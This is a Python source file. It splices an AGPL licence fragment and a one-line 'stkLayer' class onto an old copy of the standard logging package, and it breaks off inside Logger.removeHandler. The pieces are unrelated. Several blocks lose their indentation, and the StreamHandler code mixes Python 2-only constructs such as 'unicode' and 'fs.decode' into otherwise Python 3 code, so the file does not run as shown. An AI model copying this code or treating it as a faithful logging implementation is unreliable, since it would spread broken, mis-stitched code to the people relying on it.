This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import dbcon
import sys
class stkLayer(object):
    """Represents a single STK-Unit layer object."""

    def __init__(self):
        # Tag identifying this object as a layer within the tool.
        self.flag = "layer"
# Copyright 2001-2009 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python, and influenced by Apache's log4j system.
Copyright (C) 2001-2009 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, traceback, warnings
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning']
try:
import codecs
except ImportError:
codecs = None
try:
import _thread as thread
import threading
except ImportError:
thread = None
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
__version__ = "0.5.0.7"
__date__ = "20 January 2009"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
_unicode = 'unicode' in dir(__builtins__)
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame.
#
if hasattr(sys, 'frozen'): #support for py2exe
_srcfile = "logging%s__init__%s" % (os.sep, __file__[-4:])
elif __file__[-4:].lower() in ['.pyc', '.pyo']:
_srcfile = __file__[:-4] + '.py'
else:
_srcfile = __file__
_srcfile = os.path.normcase(_srcfile)
# next bit filched from 1.5.2's inspect.py
def currentframe():
    """Return the frame object for the caller's stack frame."""
    # Deliberately raise and catch so that sys.exc_info() exposes a
    # traceback whose frame chain leads back to our caller.
    try:
        raise Exception
    except Exception:
        tb = sys.exc_info()[2]
        return tb.tb_frame.f_back
if hasattr(sys, '_getframe'): currentframe = lambda: sys._getframe(3)
# done filching
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called.
#if not hasattr(sys, "_getframe"):
# _srcfile = None
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = 1
#
# If you don't want threading information in the log, set this to zero
#
logThreads = 1
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = 1
#
# If you don't want process information in the log, set this to zero
#
logProcesses = 1
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0

# Bidirectional mapping: numeric level -> name and name -> numeric level.
# 'WARN' is accepted as an input alias for WARNING but is never produced
# as output (WARNING always maps to the string 'WARNING').
_levelNames = {}
for _level, _name in [(CRITICAL, 'CRITICAL'), (ERROR, 'ERROR'),
                      (WARNING, 'WARNING'), (INFO, 'INFO'),
                      (DEBUG, 'DEBUG'), (NOTSET, 'NOTSET')]:
    _levelNames[_level] = _name
    _levelNames[_name] = _level
_levelNames['WARN'] = WARNING
del _level, _name

def getLevelName(level):
    """
    Return the textual representation of logging level 'level'.

    If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
    INFO, DEBUG) then you get the corresponding string. If you have
    associated levels with names using addLevelName then the name you have
    associated with 'level' is returned. Passing a known level *name*
    returns the numeric level. Otherwise, the string "Level %s" % level
    is returned.
    """
    return _levelNames.get(level, "Level %s" % level)
def addLevelName(level, levelName):
    """
    Associate 'levelName' with 'level'.

    This is used when converting levels to text during message formatting.
    The mapping is registered in both directions (level -> name and
    name -> level), mirroring the layout of _levelNames, and is performed
    under the module lock since _levelNames is shared mutable state.
    """
    _acquireLock()
    try: #unlikely to cause an exception, but you never know...
        _levelNames[level] = levelName
        _levelNames[levelName] = level
    finally:
        _releaseLock()
#---------------------------------------------------------------------------
#   Thread-related stuff
#---------------------------------------------------------------------------

#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates Handlers and so
#might arbitrary user threads. Since Handler.__init__() updates the shared
#dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
# Created lazily by _acquireLock(); remains None when no thread support
# is available, in which case locking degrades to a no-op.
_lock = None
def _acquireLock():
    """
    Acquire the module-level lock for serializing access to shared data.

    The lock is created lazily on first use (only when a thread module is
    available). Release it with _releaseLock().
    """
    global _lock
    if not _lock:
        if thread:
            _lock = threading.RLock()
    if _lock:
        _lock.acquire()
def _releaseLock():
    """
    Release the module-level lock acquired by calling _acquireLock().

    A no-op when the lock was never created (no thread support).
    """
    if _lock:
        _lock.release()
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord:
    """
    A LogRecord instance represents an event being logged.

    LogRecord instances are created every time something is logged. They
    contain all the information pertinent to the event being logged. The
    main information passed in is in msg and args, which are combined
    using str(msg) % args to create the message field of the record. The
    record also includes information such as when the record was created,
    the source line where the logging call was made, and any exception
    information to be logged.
    """
    def __init__(self, name, level, pathname, lineno,
                 msg, args, exc_info, func=None):
        """
        Initialize a logging record with interesting information.

        name: logger name; level: numeric level; pathname/lineno/func:
        source location of the logging call; msg/args: the format string
        and its arguments; exc_info: an exception triple or None.
        """
        # Capture the creation time first, before any other work skews it.
        ct = time.time()
        self.name = name
        self.msg = msg
        #
        # The following statement allows passing of a dictionary as a sole
        # argument, so that you can do something like
        #  logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
        # Suggested by Stefan Behnel.
        # Note that without the test for args[0], we get a problem because
        # during formatting, we test to see if the arg is present using
        # 'if self.args:'. If the event being logged is e.g. 'Value is %d'
        # and if the passed arg fails 'if self.args:' then no formatting
        # is done. For example, logger.warn('Value is %d', 0) would log
        # 'Value is %d' instead of 'Value is 0'.
        # For the use case of passing a dictionary, this should not be a
        # problem.
        if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:
            args = args[0]
        self.args = args
        self.levelname = getLevelName(level)
        self.levelno = level
        self.pathname = pathname
        try:
            self.filename = os.path.basename(pathname)
            self.module = os.path.splitext(self.filename)[0]
        except (TypeError, ValueError, AttributeError):
            # pathname may be unusable (e.g. None from makeLogRecord with a
            # partial dictionary); degrade gracefully rather than fail.
            self.filename = pathname
            self.module = "Unknown module"
        self.exc_info = exc_info
        self.exc_text = None      # used to cache the traceback text
        self.lineno = lineno
        self.funcName = func
        self.created = ct
        self.msecs = (ct - int(ct)) * 1000
        self.relativeCreated = (self.created - _startTime) * 1000
        if logThreads and thread:
            self.thread = thread.get_ident()
            self.threadName = threading.current_thread().name
        else:
            self.thread = None
            self.threadName = None
        if logMultiprocessing:
            # Imported on demand so the module flag can disable the
            # multiprocessing dependency entirely.
            from multiprocessing import current_process
            self.processName = current_process().name
        else:
            self.processName = None
        if logProcesses and hasattr(os, 'getpid'):
            self.process = os.getpid()
        else:
            self.process = None
    def __str__(self):
        return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
            self.pathname, self.lineno, self.msg)
    def getMessage(self):
        """
        Return the message for this LogRecord.

        Return the message for this LogRecord after merging any user-supplied
        arguments with the message.
        """
        if not _unicode: #if no unicode support...
            msg = str(self.msg)
        else:
            msg = self.msg
            if not isinstance(msg, str):
                try:
                    msg = str(self.msg)
                except UnicodeError:
                    msg = self.msg      #Defer encoding till later
        if self.args:
            # '%' merge only happens when args is truthy; see the dict
            # special-casing comment in __init__.
            msg = msg % self.args
        return msg
def makeLogRecord(dict):
    """
    Make a LogRecord whose attributes are defined by the specified dictionary.

    This function is useful for converting a logging event received over
    a socket connection (which is sent as a dictionary) into a LogRecord
    instance. A blank record is built first, then overlaid with the
    caller-supplied attributes.
    """
    record = LogRecord(None, None, "", 0, "", (), None, None)
    record.__dict__.update(dict)
    return record
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
class Formatter:
    """
    Formatter instances are used to convert a LogRecord to text.

    Formatters need to know how a LogRecord is constructed. They are
    responsible for converting a LogRecord to (usually) a string which can
    be interpreted by either a human or an external system. The base
    Formatter accepts a %-style format string over the LogRecord's
    attribute dictionary; if none is supplied, "%(message)s" is used.

    Useful LogRecord attributes include: %(name)s, %(levelno)s,
    %(levelname)s, %(pathname)s, %(filename)s, %(module)s, %(lineno)d,
    %(funcName)s, %(created)f, %(asctime)s, %(msecs)d,
    %(relativeCreated)d, %(thread)d, %(threadName)s, %(process)d and
    %(message)s — the last being the result of record.getMessage(),
    computed just as the record is emitted.
    """
    # Time-tuple conversion hook; assign time.gmtime (on an instance or on
    # the class) to render all timestamps in UTC instead of local time.
    converter = time.localtime

    def __init__(self, fmt=None, datefmt=None):
        """
        Initialize the formatter with specified format strings.

        When fmt is omitted the bare "%(message)s" format is used; when
        datefmt is omitted formatTime() falls back to an ISO8601-style
        timestamp.
        """
        self._fmt = fmt if fmt else "%(message)s"
        self.datefmt = datefmt

    def formatTime(self, record, datefmt=None):
        """
        Return the creation time of the specified LogRecord as formatted text.

        If datefmt (a string) is specified, it is used with time.strftime()
        to format record.created. Otherwise an ISO8601-style string with a
        comma-separated millisecond suffix is produced. The 'converter'
        attribute (time.localtime by default) maps the creation time to a
        time tuple; replace it with time.gmtime for GMT output.
        """
        timetuple = self.converter(record.created)
        if datefmt:
            return time.strftime(datefmt, timetuple)
        base = time.strftime("%Y-%m-%d %H:%M:%S", timetuple)
        return "%s,%03d" % (base, record.msecs)

    def formatException(self, ei):
        """
        Format and return the specified exception information as a string.

        This default implementation just uses traceback.print_exception(),
        trimming a single trailing newline.
        """
        buf = io.StringIO()
        traceback.print_exception(ei[0], ei[1], ei[2], None, buf)
        text = buf.getvalue()
        buf.close()
        if text.endswith("\n"):
            text = text[:-1]
        return text

    def format(self, record):
        """
        Format the specified record as text.

        record.message is computed via getMessage(); record.asctime is
        filled in only when the format string mentions "%(asctime)". The
        format string is then merged with the record's attribute
        dictionary, and any exception text (cached on the record, since it
        is constant) is appended on its own line(s).
        """
        record.message = record.getMessage()
        if "%(asctime)" in self._fmt:
            record.asctime = self.formatTime(record, self.datefmt)
        formatted = self._fmt % record.__dict__
        if record.exc_info:
            # Cache the traceback text to avoid converting it multiple
            # times (it's constant anyway).
            if not record.exc_text:
                record.exc_text = self.formatException(record.exc_info)
        if record.exc_text:
            if not formatted.endswith("\n"):
                formatted = formatted + "\n"
            formatted = formatted + record.exc_text
        return formatted
#
# The default formatter to use when no other is specified
# (yields bare "%(message)s" output; see Handler.format)
#
_defaultFormatter = Formatter()
class BufferingFormatter:
    """
    A formatter suitable for formatting a number of records.
    """
    def __init__(self, linefmt=None):
        """
        Optionally specify a formatter which will be used to format each
        individual record; the module's default formatter is used otherwise.
        """
        self.linefmt = linefmt if linefmt else _defaultFormatter

    def formatHeader(self, records):
        """Return the header string for the specified records."""
        return ""

    def formatFooter(self, records):
        """Return the footer string for the specified records."""
        return ""

    def format(self, records):
        """
        Format the specified records and return the result as a string:
        header, each record rendered by linefmt, then footer. An empty
        record list yields the empty string.
        """
        if not records:
            return ""
        pieces = [self.formatHeader(records)]
        pieces.extend(self.linefmt.format(record) for record in records)
        pieces.append(self.formatFooter(records))
        return "".join(pieces)
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter:
    """
    Filter instances are used to perform arbitrary filtering of LogRecords.

    Loggers and Handlers can optionally use Filter instances to filter
    records as desired. The base filter class only allows events which are
    below a certain point in the logger hierarchy. For example, a filter
    initialized with "A.B" will allow events logged by loggers "A.B",
    "A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
    initialized with the empty string, all events are passed.
    """
    def __init__(self, name=''):
        """
        Initialize a filter with the name of the logger which, together
        with its children, will have its events allowed through. An empty
        name allows every event.
        """
        self.name = name
        self.nlen = len(name)

    def filter(self, record):
        """
        Determine if the specified record is to be logged. Returns zero
        for no, nonzero for yes.
        """
        if self.nlen == 0 or self.name == record.name:
            return 1
        if not record.name.startswith(self.name):
            return 0
        # The record belongs to a child logger only when a "." separator
        # follows the configured prefix (rules out e.g. "A.BB" for "A.B").
        return record.name[self.nlen] == "."
class Filterer:
    """
    A base class for loggers and handlers which allows them to share
    common filter-management code.
    """
    def __init__(self):
        """Initialize the list of filters to be an empty list."""
        self.filters = []

    def addFilter(self, filter):
        """Add the specified filter to this handler (duplicates ignored)."""
        if filter not in self.filters:
            self.filters.append(filter)

    def removeFilter(self, filter):
        """Remove the specified filter from this handler, if present."""
        if filter in self.filters:
            self.filters.remove(filter)

    def filter(self, record):
        """
        Determine if a record is loggable by consulting all the filters.

        The default is to allow the record to be logged; any filter can
        veto this, in which case the record is dropped. Returns a zero
        value if a record is to be dropped, else non-zero.
        """
        for f in self.filters:
            if not f.filter(record):
                return 0
        return 1
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
# Module-level handler registries, guarded by the module lock
# (_acquireLock/_releaseLock); maintained by Handler.__init__/close.
_handlers = {}  #repository of handlers (for flushing when shutdown called)
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
class Handler(Filterer):
    """
    Handler instances dispatch logging events to specific destinations.

    The base handler class. Acts as a placeholder which defines the Handler
    interface. Handlers can optionally use Formatter instances to format
    records as desired. By default, no formatter is specified; in this case,
    the 'raw' message as determined by record.message is logged.
    """
    def __init__(self, level=NOTSET):
        """
        Initializes the instance - basically setting the formatter to None
        and the filter list to empty. Also registers the handler in the
        module-level registries under the module lock.
        """
        Filterer.__init__(self)
        self.level = level
        self.formatter = None
        #get the module data lock, as we're updating a shared structure.
        _acquireLock()
        try: #unlikely to raise an exception, but you never know...
            _handlers[self] = 1
            # Newest-first insertion, so later teardown can proceed in
            # reverse order of initialization.
            _handlerList.insert(0, self)
        finally:
            _releaseLock()
        self.createLock()
    def createLock(self):
        """
        Acquire a thread lock for serializing access to the underlying I/O.
        """
        if thread:
            self.lock = threading.RLock()
        else:
            # No thread support: acquire()/release() become no-ops.
            self.lock = None
    def acquire(self):
        """
        Acquire the I/O thread lock.
        """
        if self.lock:
            self.lock.acquire()
    def release(self):
        """
        Release the I/O thread lock.
        """
        if self.lock:
            self.lock.release()
    def setLevel(self, level):
        """
        Set the logging level of this handler.
        """
        self.level = level
    def format(self, record):
        """
        Format the specified record.

        If a formatter is set, use it. Otherwise, use the default formatter
        for the module.
        """
        if self.formatter:
            fmt = self.formatter
        else:
            fmt = _defaultFormatter
        return fmt.format(record)
    def emit(self, record):
        """
        Do whatever it takes to actually log the specified logging record.

        This version is intended to be implemented by subclasses and so
        raises a NotImplementedError.
        """
        raise NotImplementedError('emit must be implemented '
                                  'by Handler subclasses')
    def handle(self, record):
        """
        Conditionally emit the specified logging record.

        Emission depends on filters which may have been added to the handler.
        Wrap the actual emission of the record with acquisition/release of
        the I/O thread lock. Returns whether the filter passed the record for
        emission.
        """
        rv = self.filter(record)
        if rv:
            self.acquire()
            try:
                self.emit(record)
            finally:
                self.release()
        return rv
    def setFormatter(self, fmt):
        """
        Set the formatter for this handler.
        """
        self.formatter = fmt
    def flush(self):
        """
        Ensure all logging output has been flushed.

        This version does nothing and is intended to be implemented by
        subclasses.
        """
        pass
    def close(self):
        """
        Tidy up any resources used by the handler.

        This version does removes the handler from an internal list
        of handlers which is closed when shutdown() is called. Subclasses
        should ensure that this gets called from overridden close()
        methods.
        """
        #get the module data lock, as we're updating a shared structure.
        _acquireLock()
        try: #unlikely to raise an exception, but you never know...
            del _handlers[self]
            _handlerList.remove(self)
        finally:
            _releaseLock()
    def handleError(self, record):
        """
        Handle errors which occur during an emit() call.

        This method should be called from handlers when an exception is
        encountered during an emit() call. If raiseExceptions is false,
        exceptions get silently ignored. This is what is mostly wanted
        for a logging system - most users will not care about errors in
        the logging system, they are more interested in application errors.
        You could, however, replace this with a custom handler if you wish.
        The record which was being processed is passed in to this method.
        """
        if raiseExceptions:
            ei = sys.exc_info()
            try:
                traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr)
            except IOError:
                pass    # see issue 5971
            finally:
                # Drop the exc_info triple promptly to break the frame
                # reference cycle it creates.
                del ei
class StreamHandler(Handler):
    """
    A handler class which writes logging records, appropriately formatted,
    to a stream. Note that this class does not close the stream, as
    sys.stdout or sys.stderr may be used.
    """
    def __init__(self, strm=None):
        """
        Initialize the handler.

        If strm is not specified, sys.stderr is used.
        """
        Handler.__init__(self)
        if strm is None:
            strm = sys.stderr
        self.stream = strm
    def flush(self):
        """
        Flushes the stream (if it supports flushing).
        """
        if self.stream and hasattr(self.stream, "flush"):
            self.stream.flush()
    def emit(self, record):
        """
        Emit a record.

        If a formatter is specified, it is used to format the record.
        The record is then written to the stream with a trailing newline. If
        exception information is present, it is formatted using
        traceback.print_exception and appended to the stream. If the stream
        has an 'encoding' attribute, it is used to determine how to do the
        output to the stream.
        """
        try:
            msg = self.format(record)
            stream = self.stream
            fs = "%s\n"
            if not _unicode: #if no unicode support...
                stream.write(fs % msg)
            else:
                try:
                    if (isinstance(msg, unicode) and
                        getattr(stream, 'encoding', None)):
                        # NOTE(review): fs.decode() and the 'unicode' type
                        # exist only on Python 2 - this branch assumes a
                        # py2 runtime; confirm before running under py3.
                        fs = fs.decode(stream.encoding)
                        try:
                            stream.write(fs % msg)
                        except UnicodeEncodeError:
                            #Printing to terminals sometimes fails. For example,
                            #with an encoding of 'cp1251', the above write will
                            #work if written to a stream opened or wrapped by
                            #the codecs module, but fail when writing to a
                            #terminal even when the codepage is set to cp1251.
                            #An extra encoding step seems to be needed.
                            stream.write((fs % msg).encode(stream.encoding))
                    else:
                        stream.write(fs % msg)
                except UnicodeError:
                    stream.write(fs % msg.encode("UTF-8"))
            self.flush()
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            # Deliberately broad: any other failure during emission is
            # routed to handleError() so logging never crashes the app.
            self.handleError(record)
class FileHandler(StreamHandler):
    """
    A handler class which writes formatted logging records to disk files.
    """
    def __init__(self, filename, mode='a', encoding=None, delay=0):
        """
        Open the specified file and use it as the stream for logging.
        When delay is true, opening is postponed until the first emit().
        """
        # Without the codecs module an encoding request cannot be honoured.
        if codecs is None:
            encoding = None
        # Keep the absolute path, otherwise derived classes which use this
        # may come a cropper when the current directory changes.
        self.baseFilename = os.path.abspath(filename)
        self.mode = mode
        self.encoding = encoding
        if delay:
            # We don't open the stream, but we still need to call the
            # Handler constructor to set level, formatter, lock etc.
            Handler.__init__(self)
            self.stream = None
        else:
            StreamHandler.__init__(self, self._open())

    def close(self):
        """
        Flush and close the stream, then run the base-class close.
        """
        if self.stream:
            self.flush()
            if hasattr(self.stream, "close"):
                self.stream.close()
            StreamHandler.close(self)
            self.stream = None

    def _open(self):
        """
        Open the current base file with the (original) mode and encoding
        and return the resulting stream.
        """
        if self.encoding is None:
            return open(self.baseFilename, self.mode)
        return codecs.open(self.baseFilename, self.mode, self.encoding)

    def emit(self, record):
        """
        Emit a record, lazily opening the stream first if 'delay' was
        specified in the constructor.
        """
        if self.stream is None:
            self.stream = self._open()
        StreamHandler.emit(self, record)
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder:
    """
    PlaceHolder instances are used in the Manager logger hierarchy to take
    the place of nodes for which no loggers have been defined. This class is
    intended for internal use only and not as part of the public API.
    """
    def __init__(self, alogger):
        """
        Initialize with the specified logger as this placeholder's first
        child.
        """
        # A dict keyed on loggers serves purely as an identity set.
        self.loggerMap = {alogger: None}

    def append(self, alogger):
        """
        Add the specified logger as a child of this placeholder, ignoring
        duplicates.
        """
        if alogger not in self.loggerMap:
            self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
_loggerClass = None  # rebound to Logger further down; see setLoggerClass()
def setLoggerClass(klass):
    """
    Set the class to be used when instantiating a logger. The class should
    define __init__() such that only a name argument is required, and the
    __init__() should call Logger.__init__()
    """
    global _loggerClass
    # Logger itself is always acceptable; anything else must subclass it.
    if klass != Logger and not issubclass(klass, Logger):
        raise TypeError("logger not derived from logging.Logger: "
                        + klass.__name__)
    _loggerClass = klass
def getLoggerClass():
    """
    Return the class to be used when instantiating a logger.
    """
    # Whatever setLoggerClass() last installed (Logger by default).
    return _loggerClass
class Manager:
    """
    There is [under normal circumstances] just one Manager instance, which
    holds the hierarchy of loggers.
    """
    def __init__(self, rootnode):
        """
        Initialize the manager with the root node of the logger hierarchy.
        """
        self.root = rootnode
        self.disable = 0                    # global level cutoff consulted by Logger.isEnabledFor()
        self.emittedNoHandlerWarning = 0    # one-shot flag used by Logger.callHandlers()
        self.loggerDict = {}                # maps name -> Logger or PlaceHolder
    def getLogger(self, name):
        """
        Get a logger with the specified name (channel name), creating it
        if it doesn't yet exist. This name is a dot-separated hierarchical
        name, such as "a", "a.b", "a.b.c" or similar.

        If a PlaceHolder existed for the specified name [i.e. the logger
        didn't exist but a child of it did], replace it with the created
        logger and fix up the parent/child references which pointed to the
        placeholder to now point to the logger.
        """
        rv = None
        _acquireLock()
        try:
            if name in self.loggerDict:
                rv = self.loggerDict[name]
                if isinstance(rv, PlaceHolder):
                    # A descendant logger was created first; promote the
                    # placeholder to a real logger and rewire its children.
                    ph = rv
                    rv = _loggerClass(name)
                    rv.manager = self
                    self.loggerDict[name] = rv
                    self._fixupChildren(ph, rv)
                    self._fixupParents(rv)
            else:
                rv = _loggerClass(name)
                rv.manager = self
                self.loggerDict[name] = rv
                self._fixupParents(rv)
        finally:
            _releaseLock()
        return rv
    def _fixupParents(self, alogger):
        """
        Ensure that there are either loggers or placeholders all the way
        from the specified logger to the root of the logger hierarchy.
        """
        name = alogger.name
        i = name.rfind(".")
        rv = None
        # Walk up the dotted name, registering placeholders for missing
        # ancestors until an existing Logger is found.
        while (i > 0) and not rv:
            substr = name[:i]
            if substr not in self.loggerDict:
                self.loggerDict[substr] = PlaceHolder(alogger)
            else:
                obj = self.loggerDict[substr]
                if isinstance(obj, Logger):
                    rv = obj    # nearest existing ancestor logger
                else:
                    assert isinstance(obj, PlaceHolder)
                    obj.append(alogger)
            i = name.rfind(".", 0, i - 1)
        if not rv:
            rv = self.root
        alogger.parent = rv
    def _fixupChildren(self, ph, alogger):
        """
        Ensure that children of the placeholder ph are connected to the
        specified logger.
        """
        name = alogger.name
        namelen = len(name)
        for c in ph.loggerMap.keys():
            #The if means ... if not c.parent.name.startswith(nm)
            if c.parent.name[:namelen] != name:
                # c's current parent sits above alogger in the hierarchy,
                # so splice alogger in between the two.
                alogger.parent = c.parent
                c.parent = alogger
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
    """
    Instances of the Logger class represent a single logging channel. A
    "logging channel" indicates an area of an application. Exactly how an
    "area" is defined is up to the application developer. Since an
    application can have any number of areas, logging channels are identified
    by a unique string. Application areas can be nested (e.g. an area
    of "input processing" might include sub-areas "read CSV files", "read
    XLS files" and "read Gnumeric files"). To cater for this natural nesting,
    channel names are organized into a namespace hierarchy where levels are
    separated by periods, much like the Java or Python package namespace. So
    in the instance given above, channel names might be "input" for the upper
    level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
    There is no arbitrary limit to the depth of nesting.
    """
    def __init__(self, name, level=NOTSET):
        """
        Initialize the logger with a name and an optional level.
        """
        Filterer.__init__(self)
        self.name = name
        self.level = level
        self.parent = None      # filled in by Manager._fixupParents()
        self.propagate = 1
        self.handlers = []
        self.disabled = 0
    def setLevel(self, level):
        """
        Set the logging level of this logger.
        """
        self.level = level
    def debug(self, msg, *args, **kwargs):
        """
        Log 'msg % args' with severity 'DEBUG'.

        To pass exception information, use the keyword argument exc_info with
        a true value, e.g.

        logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
        """
        if self.isEnabledFor(DEBUG):
            self._log(DEBUG, msg, args, **kwargs)
    def info(self, msg, *args, **kwargs):
        """
        Log 'msg % args' with severity 'INFO'.

        To pass exception information, use the keyword argument exc_info with
        a true value, e.g.

        logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
        """
        if self.isEnabledFor(INFO):
            self._log(INFO, msg, args, **kwargs)
    def warning(self, msg, *args, **kwargs):
        """
        Log 'msg % args' with severity 'WARNING'.

        To pass exception information, use the keyword argument exc_info with
        a true value, e.g.

        logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
        """
        if self.isEnabledFor(WARNING):
            self._log(WARNING, msg, args, **kwargs)
    warn = warning      # backwards-compatible alias
    def error(self, msg, *args, **kwargs):
        """
        Log 'msg % args' with severity 'ERROR'.

        To pass exception information, use the keyword argument exc_info with
        a true value, e.g.

        logger.error("Houston, we have a %s", "major problem", exc_info=1)
        """
        if self.isEnabledFor(ERROR):
            self._log(ERROR, msg, args, **kwargs)
    def exception(self, msg, *args):
        """
        Convenience method for logging an ERROR with exception information.
        """
        self.error(msg, exc_info=1, *args)
    def critical(self, msg, *args, **kwargs):
        """
        Log 'msg % args' with severity 'CRITICAL'.

        To pass exception information, use the keyword argument exc_info with
        a true value, e.g.

        logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
        """
        if self.isEnabledFor(CRITICAL):
            self._log(CRITICAL, msg, args, **kwargs)
    fatal = critical    # backwards-compatible alias
    def log(self, level, msg, *args, **kwargs):
        """
        Log 'msg % args' with the integer severity 'level'.

        To pass exception information, use the keyword argument exc_info with
        a true value, e.g.

        logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
        """
        if not isinstance(level, int):
            # Non-integer levels either raise or are silently ignored,
            # depending on the module-wide raiseExceptions flag.
            if raiseExceptions:
                raise TypeError("level must be an integer")
            else:
                return
        if self.isEnabledFor(level):
            self._log(level, msg, args, **kwargs)
    def findCaller(self):
        """
        Find the stack frame of the caller so that we can note the source
        file name, line number and function name.
        """
        # currentframe() is sys._getframe(3) when available, so f already
        # points a few frames up; additionally skip any frames that come
        # from this module itself (compared via _srcfile).
        f = currentframe().f_back
        rv = "(unknown file)", 0, "(unknown function)"
        while hasattr(f, "f_code"):
            co = f.f_code
            filename = os.path.normcase(co.co_filename)
            if filename == _srcfile:
                f = f.f_back
                continue
            rv = (filename, f.f_lineno, co.co_name)
            break
        return rv
    def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None):
        """
        A factory method which can be overridden in subclasses to create
        specialized LogRecords.
        """
        rv = LogRecord(name, level, fn, lno, msg, args, exc_info, func)
        if extra is not None:
            for key in extra:
                # Refuse to clobber attributes owned by the formatting
                # machinery or already set on the record.
                if (key in ["message", "asctime"]) or (key in rv.__dict__):
                    raise KeyError("Attempt to overwrite %r in LogRecord" % key)
                rv.__dict__[key] = extra[key]
        return rv
    def _log(self, level, msg, args, exc_info=None, extra=None):
        """
        Low-level logging routine which creates a LogRecord and then calls
        all the handlers of this logger to handle the record.
        """
        if _srcfile:
            #IronPython doesn't track Python frames, so findCaller throws an
            #exception. We trap it here so that IronPython can use logging.
            try:
                fn, lno, func = self.findCaller()
            except ValueError:
                fn, lno, func = "(unknown file)", 0, "(unknown function)"
        else:
            fn, lno, func = "(unknown file)", 0, "(unknown function)"
        if exc_info:
            # Any true non-tuple value (e.g. exc_info=1) means "use the
            # currently-handled exception"; a ready tuple passes through.
            if not isinstance(exc_info, tuple):
                exc_info = sys.exc_info()
        record = self.makeRecord(self.name, level, fn, lno, msg, args, exc_info, func, extra)
        self.handle(record)
    def handle(self, record):
        """
        Call the handlers for the specified record.

        This method is used for unpickled records received from a socket, as
        well as those created locally. Logger-level filtering is applied.
        """
        if (not self.disabled) and self.filter(record):
            self.callHandlers(record)
    def addHandler(self, hdlr):
        """
        Add the specified handler to this logger (duplicates ignored).
        """
        if not (hdlr in self.handlers):
            self.handlers.append(hdlr)
    def removeHandler(self, hdlr):
        """
        Remove the specified handler from this logger, if present. The
        handler's I/O lock is held during removal so an in-flight emit
        completes first.
        """
        if hdlr in self.handlers:
            #hdlr.close()
            hdlr.acquire()
            try:
